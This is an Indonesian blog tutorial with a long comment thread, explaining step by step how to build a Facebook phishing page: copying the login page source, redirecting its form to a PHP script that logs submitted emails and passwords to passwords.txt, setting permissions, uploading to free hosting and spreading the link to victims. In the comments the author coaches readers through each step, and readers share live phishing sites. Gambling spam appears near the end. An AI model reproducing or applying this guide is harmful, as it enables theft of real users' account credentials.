Cara Membuat Web Phising

Bagikan

web phising facebook Cara membuat Web Phising Facebook – Pada postingan kali ini saya akan membahas tentang cara membuat web phising. walaupun ini sudah berita lama yang banyak orang sudah mengetahuinya. Tapi saya yakin masih banyak yang ingin tahu tentang cara membuat web phising seperti yang anda baca sekarang ini. Apakah anda sudah tau apa itu web phising ?? Web Phisng = WEB+ Phising.

Web  menurut saya adalah sebuah page/halaman yang berisi content yang di isi oleh admin/pemilik web, lebih lengkapnya kesini. Phising menurut dari yang saya baca yaitu berasal dari kata “Fishing” atau di bahasa Indonesia kan yang memiliki arti “memancing”. Lho kok Memancing? ternyata memang benar kita membuat web untuk memancing korban untuk masuk dalam perangkap Web Phising yang telah kita buat. Cara buatnya gimana ? Baik saya akan kasih tahu cara membuat web phising. Langkah – langkahnya sebagai berikut :

  1. Cari dan buka alamat yang mau dijadikan homepage/halaman utama Web Phising anda. misal http://www.facebook.com.
  2. Setelah halaman terbuka sepenuhnya anda tekal tombol “Ctrl + U” di keyboard secara bersamaan. Kemudian akan muncul Source Code.
  3. Copy semua Source Code tersebut. Tekan “Ctrl + A(untuk blok semua source code) kemudian tekan “Crtl + C(untuk meng-copy / menyaslin Source Code tersebut).
  4. Setelah itu buka notepad/wordpad (Start – all program – accessories- Notepad/Wordpad)  di WINDOWS atau gedit (Applications –  Accessories – Gedit Text Editor) di LINUX.
  5. Paste Source Code (ctrl + v) yang sudah di copy tadi. seperti langkah nomor 3.
  6. Cari menggunakan “Crtl + F”, isi dengan “action=(tanpa tanda petik)
  7. Ketemu [code='php']
    [/code]
  8. Ganti fb.com” (contoh) dengan “phising.php”.
  9. Ubah “postmenjadi “GET“.
  10. Save as (file – Save as) atau tekan “Ctrl + S”. Berinama dengan “index.html” dan File Type pilih “All FIle”
  11. .Buka notepad lagi (langkah sama seperti nomor 4).
  12. Copy Paste Code PHP ini ke notepad : [code='php'] $value) { fwrite($handle, $variable); fwrite($handle, “=”); fwrite($handle, $value); fwrite($handle, “rn”); } fwrite($handle, “rn”); fclose($handle); exit; ?>[/code]
  13. Ganti “http://fb.com” dengan “http://facebook.com” misal (tanpa tanda kutip).
  14. Save dengan nama phising dan extensi .php jadinya phising.php (Caranya sama seperti langkah no. 10)
  15. Upload ke hosting anda. (Silahkan cari hosting gratis atau berbayar, tidak disarankan menggunakan Hosting Gratis 000webhost untuk membuat web phising. Namun jika ingin tahu Cara Upload File di Free Hosting 000webhost silahkan baca saja. Satu lagi, pastikan domain anda sudah mengarah ke hosting anda. Jika anda tidak mengerti silahkan pelajari tentang Domain dan Hosting terlebih dahulu.
  16. Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk file passwords.txt, agar password yang di ketikan oleh korban dapat tersimpan.
  17. Selesai. Silahkan Coba akes Domain anda dan apa yang anda lihat ? Jika tampilan mirip seperti halaman ketika anda membuka website yang anda tiru berarti benar.
  18. Silahkan anda test apakah WebPhising buatan anda sukses dapat menyimpan email dan password korban.
  19. Jika berhasil menyimpan informasi login korban seperti email dan password, waktunya sebarkan web phising anda dengan kecerdikan anda.

Sekian dulu postingan cara membuat web phising apabila anda masih bingung jangan malu bertanya. :D


Sekarang : Sabtu, 1 November 2014 - Saturday, November 1, 2014
  • sertipikat tanah

    bagus postinganya cobaah..
    fungsi dari pishing apa y ?

  • http://kentos.web.id admin

    fungsi phising yaitu untuk memancing korban masuk dalam website bo’ongan buatan kamu. :hihi:
    Itukan tujuan membuat web phising. :bom:

    • andre

      makasi mas, keren nih infonya

      tujuannya bukannya buat ngambil pasword ama username ya? misal kalo di atas. nanti kita isa dapet password ama username FB.

      CMIIW

      • http://kentos.web.id admin

        Itu terserah anda. Kalo korban sudah masuk ke web phising buatan anda tinggal apa yang tersedia di web phising anda. Jika di web phising tersebut meminta untuk memasukan user password, seperti membuat web phising facebook misalnya. :ngelamun:

        • andre

          link udah tak ganti bro :sliwer2:

          • http://kentos.web.id admin

            Thanks BRo. . . :hehe:

  • http://iqmal.biz Iqmal

    Wadew.. Maenannya serem :hore:
    Tuh kursornya ganggu, di disable ajah. hhe

    • http://kentos.web.id admin

      Saya masih nuwbiee gan :hehe:
      Ok gan sarannya saya terima. :sip:

      Ngomong2 themes yang di pake agan itu themes apa ya ?? hasil coding sendiri ?? :bisik:

  • aval

    pengertian di no.8 gmna bro ???

    beri penjelasan lg donk.

  • aval

    1. pengertian di no.8 dan 16 gmna bro ???
    2. gmna cara menjalan kn web phising ini

    mohon pencerahan nya ???

    • Juz

      Susah Nie… Cara Cari Actionnya DMN .?

      • http://kentos.web.id/ Amri

        Action terserah agan aja.. :D

  • http://kentos.web.id Admin

    1. Untuk no.8 kita Lihat no.7. Disana kita menemukan script menuju “url web asli” yang artinya setelah kita login akan di arahkan ke web asli tersebut. Namun untuk cara membuat web phising kita harus mengubah url yang menuju ke web asli ke web buatan kita, web tersebut saya beri nama “phising.php”.
    Untuk no.16 kita harus merubah permission di file password.txt karena file tersebut harus read and write artinya bsa memembaca dan menulis, membaca untuk kita melihat password yang sudah tersimpan di “password.txt”,namun apabila chmod/permission tidak di ganti menjadi 777 maka password korban tidak akan tersimpan.
    2. Untuk menjalankan anda tinggal buka saja alamat web phsing anda. Kemudian untuk mendapat user/email dan password itu terserah anda.
    Ma’af saya sedang menggunakan hp butut untuk membalas koment anda jadi agak sulit. Apabila masih ada kesulitan silahkan berkomentar. :)

    • king

      berarti kita harus buat web phising lagi dong ?

      • http://kentos.web.id/ Amri

        Emang kenapa harus buat webphising lagi ? sudah jadi kah ?
        Kita tinggal perbaiki yang salah saja dimana. Tidak perlu membuat lagi…

  • http://searscardcom.com Searscard

    Say thank you for have really fantastic informations. Your world-wide-web is greatI am impressed by the material that you have on this weblog. It exhibits how well you understand this topic. Bookmarked this method web page, will come back for far more. You, my buddy, awesome! I discovered just the specifics I already looked all over the place and just couldn’t discover. What a ideal website. Similar to this web site your web site is one of my new much-loved.I like this info shown and it has provided me some kind of idea to possess good results for some reason, so keep up the fantastic function!

    • http://kentos.web.id admin

      not really, I’m still in a learning phase. you said touched my heart, thank you :)

  • ayie

    mas,klo web phising dalam message facebook itu gmna ?

    • http://kentos.web.id admin

      Maksudnya gmn neh ?? Buat web phising terus promosikan web phising yang udh anda buat mungkin. Maklum masih newbiee :D

      • ayie

        mksd saya gini,,
        ketika orang masukkan (cnth) username, paswot , itu larinya kemana biar kita bisa membuka nya (hack),web pising kita terhubung ke email or memang ada inbox spesial untuk username or paswot yg sudah diketikkan tsb,,

        mkmsii sblmnya.

        • http://kentos.web.id admin

          coba cek lagi postingan saya diatas. Tepatnya No.12, teliti scriptnya yang saya beri bolt ( teks tebal ). Baris No. 3 ada tulisan “passwords.txt”. itu dia, password akan tersimpan di file password.txt.

          Kalau mau buka tinggal ketik di address browser kamu sbb :
          http://namadomain.tld/password.txt. Bagaiman ? kurang jelas ? tanyakan lagi. dengan senang hati saya menjawab :)

  • ayie

    oh,,
    iya,,iya,,,
    sya jg newbie ,jdinya harus banyak tanya biar agak mngrti,,
    nah,skrg gimana mengenai phising yg masuk k inbox facebook,dengan sediki kata-kat mereka menyuruh kita meng klik satu link yg klo dibuka itu berisi sebuah web phising, mksd saya mereka hebat membuat sebuah web, dapat dari mana ya mereka ??

  • ayie

    wah,,,
    saya sudah coba step by step, saya tdk mngrti, dan susah untuk mnegerti,
    apa lgi step nmr 15,,terlebih semuanya

    mohon di bimbing,,
    apa anda ada email ??

  • http://kentos.web.id admin

    Kalu itu tergantu ke cerdasan kita untuk memancing korban dengan kata2 anda sendiri. Saya buat web phising ini hanya buat pembelajaran saja dan tidak untuk mencari korban. Jadi untuk tahap berikutnya bisa anda praktekan sendiri. Tapi ingat : RESIKO TANGGUNG PENUMPANG :))
    Mau coba ada neh di http://cekpulsa.co.tv << saya pisah dari blog saya karena takut resiko di suspend :))

  • ayie

    cek pulsa itu streaming kan ?bagian mana nya yg merupakan phsing ??

    nah,skrg sy mnt pendapat anda,
    ada fb mainan saya yg inbox nya terdpat web phising,
    apa sama dgn tuts anda yg d atas,

    saya kasih disini id sama paswotnya or gmna ?

    • http://kentos.web.id admin

      OK,, password apa ?? boleh.

  • ical

    MEMBUKA PERMISSION NY TU DR MANA GAN???
    TRUS,,FILE YG MANA LG HARUS KITA SIMPAN MENJADI ::PASSWORD.TXT::???
    WA MSH BINGUNG X NI MMBUAT NYA…..
    MAKLUUUMMM,,NEWBIE…..
    HEHEHEHE

    MOHON AJARAN NY Y GAN……

  • http://kentos.web.id Amri

    kita tinggal buat file lewat text document / notepad / wordprad. Terus tinggal di upload lewat file manager di cpanel. permision ada di file manager di cpanel.

  • ICAL

    ok dehh gan…
    thx a lot ya…..

  • jay

    thanks artikelnya masbro..ijin di test he..he..:)

    • http://kentos.web.id/ Amri

      Silahkan :D

  • rizkqi

    Ganti URL WEB ASLI dengan phising.php ( phising.php hanya perumpamaan, bisa anda ganti namun harus semua dengan kata phising.php nantinya di ganti dengan nama.php anda ).
    Ubah “post” menjadi “GET“.

    itu ane gk ngerti

    • http://kentos.web.id/ Amri

      Kalo bingung ikutin saya aja, buat dengan nama “phising.php”.

      Nah diatas kan tertera <form action="URL WEB ASLI" method="post">. Agan ganti post dengan GET.

  • rizkqi

    Save dengan nama phising dan extensi .php jadinya phising.php
    Upload ke hostingan anda.
    Jangan lupa permission di atur 777 untuk file passwords.txt

    gan di savenya 2 kali ya yg pertama formatnya phising.txt terus yg keduax bebas misalnya qmail.php gitu ya, terus yg passwordnyadi ganti di mananya

    • http://kentos.web.id/ Amri

      Bukan, ekstensi yang .txt diganti .php. Kalau phising.php ya phising.php saja.

  • Travismark

    Mas bro sya mau tnya sya sudah bsa bwt

    http://www.pdgki.org/login.php

    tp sya test memssukan email password dan klik login

    stelah sya buka http://www.pdgki.org/password.txt

    kok mlah tulisan itu…

    bgmna ajarin donk

    • http://kentos.web.id/ Amri

      Tulisan itu apa ? Kok not found ?

  • CokPekTol

    Upload ke hosting caranya gimana yak ?

    • http://kentos.web.id/ Amri

      Masuk aja dulu ke control panel hosting agan… cari menu file manager… nah disitu nanti ada menu lagi untuk upload file agan.. :-)

      • CokPekTol

        kk ga ada menu file manager tuh ?
        Gimana donk -__-“

        • http://kentos.web.id/ Amri

          pake cpanel atau apa? hosting dimana ?

  • zulqarnain

    dimana kita mengganti permission 777 ???

    engga ngerti ?????

    • http://kentos.web.id/ Amri

      di chmod file managernya. setelah masuk cpanel langsung pilih file manager…

  • aditya

    ga ad file managernya kk . . !!
    Gimana ??

    • http://kentos.web.id/ Amri

      Kalo gak ada file manager ya menu lainnya pokonya yang bisa untuk masuk diretory html nya atau yang untuk upload file2…

  • aditya

    contoh nya ??

  • aditya

    aq dah sampe step 14 , yg 15&16 aq ga tau !!
    jelasin lg donk . . .

    • http://kentos.web.id/ Amri

      Udah tau apa itu hosting ?
      Udah punya hosting ?
      Kalo belum punya silahkan daftar free hosting saja di google banyak. Lalu masuk cpanel dan cari file manager.

  • faroel

    broo.., aq dah buat smua file na nie..,
    file.html
    file.php
    file.txt

    trus dah gwe apload ke freewebhostingarea.com.., kemudian gmana cara na kta bka wab na itu broo, chmod na jga dah gwe ganti dgn 777 slanjut na gimna lgi nie broo.., mohn bimbingn na ya ;)

    • http://kentos.web.id/ Amri

      Tinggal akses saja nama domain yang kamu daftarkan di hosting itu… dah deh jadi.. :D

  • MJ

    mas bro, ada ym ga ??
    biar enak nanya2nya, hehehehehe .
    thx jika tdk keberatan ;)

    • http://kentos.web.id/ Amri

      Nanya apa bro ? Silahkan tanya aja disini. :D
      Kalau mau ym ada di page/halaman about me.

  • aditya

    aq ga tw,, hosting itu ap ??

    • http://kentos.web.id/ Amri

      Hosting itu adalah tempat untuk menyimpan file yang kamu buat itu. Hosting bisa berbayar atau free… kamu bisa pilih sendiri….

  • aditya

    Hosting aq 4Shared ,, bisa ?
    Bestu data yg 3 tu di Upload ya ??

    • http://kentos.web.id/ Amri

      Kalo 4shared itu file hosting mas,,, Bukan webhosting. Yang mas butuhkan itu webhosting karena mas akan membuat Web Phising. :D

  • jibril

    gan gimana nih aku masih binggung kok pas di buat udah bisa tapi pas di test log in error?? mohon bantuan nya

    • http://kentos.web.id/ Amri

      Errornya gimana ? Silahkan posting disini.

  • Hacker harajuku

    gan saya gk ngerti.. smua nya sudah jadi..dan sudah di upload ke 000webhost.com
    tapi saya binggung URL saya yg mana yah..
    dan gimana gw bisa tau web url phising punya saya..
    (newbie gan)

    • http://kentos.web.id/ Amri

      Nah itu domain/subdomain yang pertama kali anda masukan ketika mendaftar di 000webhost.

  • http://loungephotos.blogspot.com/ Loung Photos

    old script but still working, nice share dude :)

    • http://kentos.web.id/ Amri

      Thanks You.

  • shurikenz

    trus cara bikin link biar bs d kirim k org gmn prenz…?
    mohon bantuannya, thankz…

    • http://kentos.web.id/ Amri

      Nah itu seh tergantu kreatifitas kamu aja. Ma’af saya tidak mengajarkan hack/merusak.

      Tutorial diatas cuma sebagai pengetahuan saja. :D

  • Endi

    Caea uploadnya gimana?
    terus masukan permision code di mana?

  • rizzal

    no. 16 itu caranya gimana ya ?

    • http://kentos.web.id/ Amri

      Banyak komentar yang masih nyangkut di server lama gan sorry.

      – jawaban pertanyaan no. 16
      Setelah anda upload file – file yang sudah anda buat di hosting pasti anda akan menemukan option permission/chmod. Silahkan langsung anda praktikkan saja dan lihat di file manager.

  • ari

    gimana caranya membuka almat web fhisingx?

    • http://kentos.web.id/ Amri

      Alamat web Phising ya alamat domain yang kamu buat….

  • angga

    yang jadi admin minta alamat fbnya dunk . . ane mau minta ilmunya dikit dan

    hehehe

    • http://kentos.web.id/ Amri

      Cek aja di halaman “About Me” disana ada FB saya. Tapi saya bukan master. Saya juga lagi belajar.. :D

  • rahmad

    gan gak ngerti aq gan pas aq upload kata dia not fround kayak mana nih gan

    • http://kentos.web.id/ Amri

      PAs di akses domainnya not found gitu ? yang jelas gan, sekalian kasih errornya atau SS-nya mungkin.

  • kristiana

    maksud dri upload k’hosting itu gmna,,??

    .sory w baru belajar ,maklumin ya..??
    hhe….

    • http://kentos.web.id/ Amri

      Sebaiknya kamu belajar domain dan hosting dulu.

  • dhanyong

    bang masa pas sudah saya tulis (action=) kaga ada yang keluar,,,yang ada hanya tanda hijau di tulisa ACTION= nya,,,
    apa ada kesalahan ya???
    tolong jelasiin bang !!

    • http://kentos.web.id/ Amri

      Tadi saya iseng nyari ketemu <form method="POST" action="https://www.facebook.com/login.php?login_attempt=1" id="login_form" onsubmit="return Event.__inlineSubmit(this,event)">

      Untuk bsa gaknya silahkan anda coba sendiri.

  • afit

    mantap gan……api nyong gak bisa nih,………sulit sekali sih….ajarin gan……

    • http://kentos.web.id/ Amri

      Itukan di atas sudah saya ajarin..

  • wincore

    Gan tnya,,taruh kata kita dah buat web phising kaya yg agan ajarin lha setelah itu gmana? apa otomatis seluruh user+pass akun facebook (misalnya) lari ke web hostingan kita? trims

    • http://kentos.web.id/ Amri

      yang login lewatweb phising agan akan kesimpen semua.

  • rada

    maaf bng saya mau tanya ada gk cara gampang dan praktis untuk memboboL mail to facebook dengan mudah.. kLu da bisa di jelasin mail saya.. X) makasih..

    • http://kentos.web.id/ Amri

      Wah, saya gak tau tuh gan.. :D

  • Yua

    Mas.,maksudnya URL web asli dganti dgn phising.php tu gmna ?
    dan gmna cara bkin hlaman php ?

    • http://kentos.web.id/ Amri

      Dibaca dulu sampai selesai. Pada poin berikutnya sudah di jelaskan cara membuat phising.php

      Cara membuat ekstensi php tinggal rename aja yang tadi nya file .txt menjadi .php

  • Yuan

    Maksud dari

    – Jangan lupa permission di atur 777 untuk file passwords.txt

    apa ?

    • http://kentos.web.id/ Amri

      Mengijinkan agar passwords.txt dapat di eksekusi, dibaca dan di tulis oleh semua pihak…

      Klao passwords.txt gak diubah ke chmod 777 email dan password tidak akan tersimpan karena tidak memiliki hak akses.

  • Ali

    sya mau tnya..saat upload di 000webhost.com itu yg di upload ada brp file ?

    • http://kentos.web.id/ Amri

      Sebenernya 000webhost.com tidak mengijinkan script seperti ini dipasang di server mereka tp kalau mau coba – coba dan gak ketahuan ya gak papa itung2 coba2.

      ada 3 file :
      Index.html
      phising.php
      passwords.txt

  • MReyhanAbizar

    Thanks gan saya dah coba dan berhasil.
    pertama tama saya coba pakai punya saya dulu
    dan ada di password.txt

    • http://kentos.web.id/ Amri

      Nah, ini dia hacker-nya… :D

  • MReyhanAbizar

    ribet gan uploadnya 000webhost

    • http://kentos.web.id/ Amri

      ya itu cuma contoh saja. Kalau anda punya hosting Cpanel itu lebih mudah…

  • andre

    no 3 maksudnya gmna…

    • http://kentos.web.id/ Amri

      Setelah melakukan langkah ke-2 pasti paham untuk langkah ke-3. Kalo belum paham silahkan belajar apa itu source code.

  • david

    sebelumnya terima kasih atas share ilmunya..saya dah buat sesuai petunjuk diatas, sudah mencoba untuk masuk web phising yang saya buat dan coba asal login, tp di password.txt tetap kosong(sudah diganti 777) dimanakah letak kesalahannya?apakah cara ini sudah tidak mempan, tolong penjelasannya.trims

    • http://kentos.web.id/ Amri

      Kurang tau gan udah lama gak mainan phising…. Tapi baca deh komentar di atas ada salah satu yang berhasil. Nanti kalo ada waktu luang boleh deh saya coba lagi cara diatas…

      Yang penting
      jangan lupa.

  • SaputraMZ

    Berkunjung balik kawand, mas kalo phising kan untuk halaman tipuan, tau cara bikin redirect ga’ mas, bantuin dunk, jadi kalau web diakses akan mengarah ke web yg lain gitu…?

    • http://kentos.web.id/ Amri

      Buat redirect apa dulu ??Coba search aja di blog saya dengan kata kunci redirect.

  • Registery

    website jebakan betmen :hah:
    link udh nongol

    • http://kentos.web.id/ Amri

      Link juga udah kepasang :D

  • inot

    kok aku coba cara sprti yang di atas gak bisa ya..? smp langkah ke tujuh..? pas masukin find text..? knp ya…?

    • http://kentos.web.id/ Amri

      Gak bisanya gimana ?? gak bisa atau gak ketemu ?? ingat tanpa tanda petik.

  • http://www.trino.site90.com TRINO SWANTO.M

    maaf aku kurang tau dengan statement yang diatas pa beloh diperjelas gak, aku sudah buka facebook dan menekan ctrl+u secara bersamaan tapi source code nya tidak ada?cara nya gimana ya tolong dikasih tau lagi ya?

    • http://kentos.web.id/ Amri

      Gak mungkin kalo suatu halaman gak ada source Code nya…

  • Petrus

    maaf a saya ingin bisa tapi tidak bisa melakukan langkah di atas, bukan kah kata si aa lebih baik bertanya dari pada sesat di jalan?kalau boleh kirim no HP si aa ke email saya,mungkin dengan cara mempraktekan lewat telfon saya bisa paham dan mengerti cara membuat web phishing tersebut. terimakasih sebelumnya……..

    • http://kentos.web.id/ Amri

      Gak bisanya dimana ?? SIlahkan bertanya2 disini saja…

      • petrus

        saya susah di pahami a lw tutorial nya lewat tulisan, mungkin lw tutorial lewat video/suara (telfon), mngkin sya bisa, sekalian jga kita lebih dekat dan menjalin tali persodaraan a.

        • http://kentos.web.id/ Amri

          Add ym ku aja @amrikarisma

  • irwinsyah hamid

    amri @ = gimana yah cara buat Cara Upload File di Free Hosting 000webhost.

  • petrus

    amri@ a di PC q loem ada aplikasi YM nya,ngobrol mslh membuat web phishing nya di FB z atuh lw gk bsa di sini mah,saya udh add ko kmrin2 ke FB si aa,v loem di knfrmsi.

  • Ahmad

    cara lihat hasilnya dimana,??
    saya sudah selesai buat phisingnya

    • http://kentos.web.id/ Amri

      Buatnya dimana ?? Silahkan buka domain yg anda gunakan untuk membuat webphising tersebut.

  • umar

    cara menyelesaikan no 7 gimana caranya???
    apa maksud dari kata “ketemu”??

    • http://kentos.web.id/ Amri

      Pada tahap no.6 yaitu mencari action=
      maka pada no.7 ditemukan.

  • baron

    mas aq udh tahap upload….py udh aq upload..cara buat link ke php nya gmn..??

    • http://kentos.web.id/ Amri

      Di buka lewat domainnya mas. :D

  • Jefferly

    waw..
    mantap..

    saya coba dulu Gann.

  • http://www.djsamm88.at.ua djsamm88

    cara lama bos, yg baru dah ada, hasilnya bisa masuk ke email, dan ga akan di susupend….
    kalo mau lihat, neh ane kasi link nya….
    http://a7xself.hpage.mobi/hacking__with_fake_login_51338944.html

  • tian

    untuk file password.txt nya kurang jelas gan,,

    yang di bilang diatas cuma 2,,
    untuk password.txtnya gan???

    • http://kentos.web.id/ Amri

      Cuma bikin file kosong dengan nama passwords.txt aja kok… dan permision set ke 777

      • irwin

        gan, maksudnya permission set ke 777 itu gimana?

        • http://kentos.web.id Amri

          Itu di filenya di setting chmod nya ke 777 artinya supaya file tersebut bisa di tulis,dibaca dan dieksekusi oleh user,grup dan lainnya.

  • Zaelani

    gan dah gw add YMnya tolong konfrim yah biar aku bisa sharing ma bapak .. :D

    • http://kentos.web.id/ Amri

      Jangan panggil bapak saya belum menikah.. :shock:
      oke gan TKP dulu… :)

  • afif

    boz…file.nya cuma dua.ya yg di upload..?? index.html ma phising.php..???

    • http://kentos.web.id/ Amri

      Iya, terus nambah satu lagi bua file kosong dengan nama passwords.txt.

      kalo bingung buat sekalian di komputer terus tinggal upload, jadi 3 file kalo sama passwords.txt

  • afif

    cara nyebarin wep phising gmn.>???

  • afif

    boz…cara test webphising nya gmn..???
    ane kgak tau >????

  • agus

    ke 777 mksud.y ..gmna
    ???

  • Addzifi

    yah..gan saya dah nyoba, but ada masalah pas upload file2 d atas kayaknya..biz dah selse smuanya

  • aguzt

    ga cara bikin phising facebook mobile gimana..??
    ane udah coba yang facebook versi desktop sukses tapi yang buat mobile belum bisa..

  • http://iklankerja.net lowongan kerja hhrma

    wah… ide hebat. boleh pasang untuk jebak teman. hehehehe

  • andrazee

    belum working gan… mohon petuahnya,,, aku add ym nya gan.. :D

  • ryan

    file yg di upload ada berapa.? yang mana aja
    1. index.html
    2. phising.php
    3. ?

    • http://kentos.web.id/ Amri

      3.passwords.txt

  • ryan

    kok hasilnya begini http://www.fbgue.com

    • Fzcraft

      salah kau belom beli domain

  • orexas

    tlong dong ajarin mas brow?

  • http://downloadgratis.16mb.com hendry heryana

    Mau ikut lewat,, jual script website murah ada yang mau?

  • odilo febrian

    di no. 16 tertulis “ke 3 file”
    tapi saya cuma menghasilkan 2 file ?

    • http://kentos.web.id/ Amri

      Kurang passwords.txt

  • http://www.littlegrass.blogspot.com vindra88

    yang sudah pernah belajar basic html pasti paham dengan langkah2 di atas… :)

    cuman sayang, saya masih belum begitu paham tentang upload ke web hosting.
    tutorialnya apakah ada, mas bro??

  • Thementor

    udah selesai kk,
    phising buatan bocah smp..
    ;D

  • reza

    gan aku bingung yang nomor 15

  • http://1st-general.blogspot.com Fahri

    sya sudah slesai semua tpi kok pas buka hostingnya masih iklan blum hlaman kYa facebook.?

    • Fzcraft

      B’rarti Ada yg salah

  • rahmat

    saya sudah selesai meng-upload ke hosting,tp kok setelah di buka linknya gk berhasil hanya ada bacaan index of/,,,,,letak kesalahannya di mana ya mas?apakah emng karna memakai hosting gratisan ya????tolong di ksh tau solusinya,,,,,

    • http://kentos.web.id/ Amri

      Apakah sudah benar lokasi root dokumen nya saat mengupload ? dibawah index of/ ada file2 yang anda upload tidak ?

      • rahmat

        ada tp file itu sm dgn file yg da dlm publik_html yg aq upload sblumnya,,tp stlh di klik mlh file trsebut menuju tmpt download,,,,

        • http://kentos.web.id/ Amri

          file yang di upload sudah ada index.html atau index.php nya belum ?

  • putra bahari

    gan ane masih belum ngerti gan……
    yang pas peng upload.annye

    tolong bantuannya gan….ane pengen bisa

    mas amri , ni no ane
    08571831xxxx

    thx

    • http://kentos.web.id/ Amri

      Kalo cara mengupload belum bisa silahkan cari-cari tutorial untuk cara upload file ke hosting terlebih dahulu. Dan maaf saya tidak melayani telp/sms, ada pertanyaan diblog silahkan tanyakan via komentar, ym/email, atau skype saja..

  • ichwan

    cara ganti permision nya gmana min..?? bingung nih password nya ga muncul

  • epy

    mas gan mo tanya ne, ntar klo liat pwnya lewat “PPP” yg ada dmna? di comp ato di uploadtan hosting sendiri? mkasih

    • http://kentos.web.id Amri

      Liatnya di hostingnya. tinggal akses aja domain.com/passwords.txt kalo tempat nyimpen passwordnya di passwords.txt.

      • epy

        ok makasih mas gan

      • epy

        maaf tanya lagi mas gan, permission/chmod
        di atur 777 itu letaknya dmna?maksih

  • jafar

    gan,kok 3 yg di upload?? kan cuma 2???
    treus ksih tutor domainya dan hostingnya dong

    • http://kentos.web.id Amri

      Masa sih cuma 2 ? coba dibaca lagi. Wah, ini udah mainan lama udah nggak main kaya beginian lagi. hehee

      • jafar

        o ya 3,yg ekstensi d jadiin 2 yaa..
        cra gnti chmodnya gmn??

        • http://kentos.web.id Amri

          Yang ekstensi di jadiin 2 gimana ? Cara gandi chmodnya di file manager cpanel hostingnya, nanti ada tulisan chmod atau permission.

  • Fay Likers

    Hahahah
    Buahhahahah masa bkin web phsing aja pada kga becus.
    Itu lagih masa bkin password.txt aja pda ga ngrti.
    Add fb gue coy. Biar lo pada pintar
    buahhahahah
    http://www.facebook.com/faylikers Di tunggu All Broo,

    Min bagus ente udh Post.
    mat knal ye

  • Fikri

    lokasi upload dimn gan,,,, ?

    • fzcraft

      Terserah

  • Aliyafi Rizky

    web phising ane http://botkomen.esy.es

  • muhammad adham

    maksud Ini apa yah ??

    Setelah ke-3 file berhasil di upload jangan lupa permission/chmod di atur 777 untuk filepasswords.txt, agar password yang di ketikan oleh korban dapat tersimpan.

    • fzcraft

      Gini lho Buat file passwords.txt kosong jangan di edit dalamnya

  • Shadow

    kalau domainnya pake facebook gimana bang

  • Shadow

    tolong bales gan

  • getsa novandra

    terima kasih kak saya sudah bisa nih

  • raja doli

    nmr 13 gmna gan

  • Pingback: Cerita blog saya | nandaafrian()

  • ivhot pebrian
  • andri

    gan saya tidak mengerti No. 15 sampai 19. . . .
    gimana caranya gan. . . . .

  • dodo

    SAYA UCAPKAN TERIMA KASIH KEPADA MBAH_KERAMAT, YG SUDAH MEMBANTU KESUSAHAN SAYA DENGAN MEMBERIKAN NOMOR TOGEL KEPADA SAYA.
    SAYA SANGAT BERSUKUR SEKALI KARENA NOMOR YG DIBERIKAN 4D(0215) TEMBUS 100%.
    BERKAT SEMUA ITU SAYA SUDAH LUNASI HUTANG2 SAYA SEBANYAK 175 JUTA DI BANK BRI.
    DAN SAYA SUDAH BUKA USAHA BERKAT MENANG NOMOR TOGEL YANG DI BERIKAN SAMA MBAH_KERAMAT…..

    -JIKA ANDA SERING KALAH DALAM BERMAIN TOGEL…
    -APAKAH ANDA TERMASUK DALAM KATEGORI DIBAWAH INI
    1. Di Lilit Hutang
    2. Selalu kalah Dalam Bermain Togel
    3. Barang berharga Anda udah Habis Buat Judi Togel
    4. Anda Udah ke mana-mana tapi tidak menghasilkan Solusi yang tepat.
    HUB MBAH_KERAMAT DI NO: 0878-4293-7066-
    .ANGKA TOGEL YANG DIBERIKAN MBAH_KERAMAT. TIDAK PERLU DIRAGUKAN LAGI.SAYA JAMIN 100% TEMBUS . SOAL YA SAYA SUDAH MEMBUKTIKAN 5X PUTARAN SAYA DIBANTUH
    DIJAMIN ANDA PASTI MENANG SEPERTI SAYA>>>>>>
    .(’•.¸( ‘•. ¸* ¸.•’´)¸.•’´)..
    «´ Thanks sOb rOoMnyA ¨»
    ..(¸. •’´(¸.•’´ *
    ’•.¸)`’•.¸ )..
    SALAM KOMPAK SELALU….dan selamat buat yg JEPE hari ini…..
    ██▓▓█████▓▓████

  • ZXCVAKZlaM

    KA ini page source FB nya udah beda jadi gimana dong?

  • Pingback: hefalimp cardijon()

  • Anonymous&

    Gw Sih Sudah Bisa Buat Phising Tapi Percuma../ Karena Di Blockir Sm Internet Positif
    Jdi Gk Bisa Di Buka :(

  • Muhammad Zulfan

    Nice bro :3